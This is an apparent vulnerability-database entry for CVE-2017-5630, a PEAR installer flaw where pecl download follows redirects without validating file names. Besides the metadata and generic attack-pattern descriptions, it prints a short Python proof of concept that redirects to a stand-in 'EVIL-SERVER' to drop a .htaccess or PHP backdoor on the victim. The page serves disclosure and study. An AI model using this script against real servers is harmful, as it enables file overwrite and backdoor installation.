Vulnerabilities > CVE-2017-5630 - Injection vulnerability in PHP Pear 1.10.1

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
PARTIAL
Availability impact
NONE
network
low complexity
php
CWE-74
exploit available

Summary

PECL in the download utility class in the Installer in PEAR Base System v1.10.1 does not validate file types and filenames after a redirect, which allows remote HTTP servers to overwrite files via crafted responses, as demonstrated by a .htaccess overwrite.

Vulnerable Configurations

Part Description Count
Application
Php
1

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Buffer Overflow via Environment Variables
    This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
  • Server Side Include (SSI) Injection
    An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.
  • Cross Site Scripting through Log Files
    An attacker may leverage a system weakness where logs are susceptible to log injection to insert scripts into the system's logs. If these logs are later viewed by an administrator through a thin administrative interface and the log data is not properly HTML encoded before being written to the page, the attackers' scripts stored in the log will be executed in the administrative interface with potentially serious consequences. This attack pattern is really a combination of two other attack patterns: log injection and stored cross site scripting.
  • Command Line Execution through SQL Injection
    An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
  • Subverting Environment Variable Values
    The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.

Exploit-Db

descriptionPHP PEAR 1.10.1 - Arbitrary File Download. CVE-2017-5630. Webapps exploit for PHP platform
fileexploits/php/webapps/41185.txt
idEDB-ID:41185
last seen2017-01-30
modified2017-01-30
platformphp
port
published2017-01-30
reporterExploit-DB
sourcehttps://www.exploit-db.com/download/41185/
titlePHP PEAR 1.10.1 - Arbitrary File Download
typewebapps

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/140796/PEAR-ARBITRARY-FILE-DOWNLOAD.txt
idPACKETSTORM:140796
last seen2017-01-30
published2017-01-29
reporterhyp3rlinx
sourcehttps://packetstormsecurity.com/files/140796/PEAR-Arbitrary-File-Download.html
titlePEAR Arbitrary File Download

Seebug

bulletinFamilyexploit
descriptionAuthor: **mapl0** ### Vulnerability details In the PEAR Base System The 1. 10. 1 version of the installer, can be in after the redirect does not verify file type and file name, and then allows the remote http server via a specially crafted request to overwrite the hacked server files, such as. htaccess is. When the attacker to run pecl download When you can trigger the vulnerability. pear not because of the with original file names duplicate and rename the invalid file. Therefore, the attacker can overwrite the original file or the download of a backdoor, the premise is pecl the request is from web directories. Moreover, the pecl are not deleted by this method to get the file, thus giving the attacker time in the file is noted before going to brute force the back door file. POC Video: https://vimeo.com/201341280 The original version of you. https://pan.baidu.com/s/1dFaHTxZ Personal recording, the clarity is a bit poor ### Point to prove: This poc has three key points: First and foremost, the victim issued a pecl download command request. Then is the attacker the server receives a file download request. The last is a php Backdoor to be attacker to obtain. 1)The Victim Server attempts to download legitimate. tgz file. pecl download http://VULN-SERVER:8080/Test.tgz 2)the attacker's server receives the test. tgz request and reply. 3) pecl unintentionally download a malicious php Backdoor The attackers on the server run: python-m SimpleHTTPServer 8888 python PECL-File-Exploit.py import socket HOST='localhost' PORT=8080 TARGET='http://EVIL-SERVER:8888/' FILE='. htaccess' s = socket. socket() s. bind((HOST, PORT)) s. listen(10) print 'Waiting for PECL connections...' while True: conn, addr = s. accept() junk = conn. recv(512) conn. send('HTTP/1.1 302 Found\r\n') conn. send('Location: '+TARGET+FILE+'\r\n') conn. close() s. close() When the attacked server to download the file: C:\xampp\htdocs\webapp>pecl download http://VULN-SERVER:8080/Test.tgz downloading Evil.php ... Starting to download Evil.php (4,665 bytes) ..... done: 4,665 bytes It will, incidentally, leave the back door download to the current directory File C:\xampp\htdocs\webapp\Evil.php downloaded **Personal summary**: the exploit conditions there are harsh, need to be the attacker active in the web directory of running perl, and the target url need to be the attacker's server. However, the vulnerability to be used on a social networking site phishing, the danger is also great. ### Disclosure Timeline: * Vendor Notification: January 11, 2017 * Informed "PECL package no longer maintained" on : January 23, 2017 * Opened Bug #2117 : January 25, 2017 * January 29, 2017 : Public Disclosure References: https://www.exploit-db.com/exploits/41185/
idSSV:92633
last seen2017-11-19
modified2017-02-01
published2017-02-01
reporterRoot
titlePHP PEAR 1.10.1 - arbitrary File Download Vulnerability (CVE-2017-5630)